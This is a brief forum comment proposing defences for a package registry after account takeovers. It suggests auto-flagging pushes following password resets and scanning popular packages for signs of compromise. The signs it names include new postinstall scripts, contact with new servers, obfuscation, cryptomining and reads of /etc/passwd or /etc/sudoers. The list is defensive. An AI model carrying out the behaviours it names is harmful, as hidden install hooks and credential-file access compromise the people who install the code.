|
|
|
|
|
|
by lozenge
1577 days ago
|
|
|
Some mitigations could be: Auto-flagging every push from an account for a while after a password reset Automatically scanning code of frequently downloaded packages for unusual changes (like: adding a postinstall script, contacting a new server in the postinstall script, obfuscated code, near-total rewrite of the code, inclusion of cryptomining, access of sensitive files like /etc/passwd or /etc/sudoers). The vagueness of the statement suggests to me they're talking about their defense-in-depth and have never thought about this specific route to account takeover before. |
|
|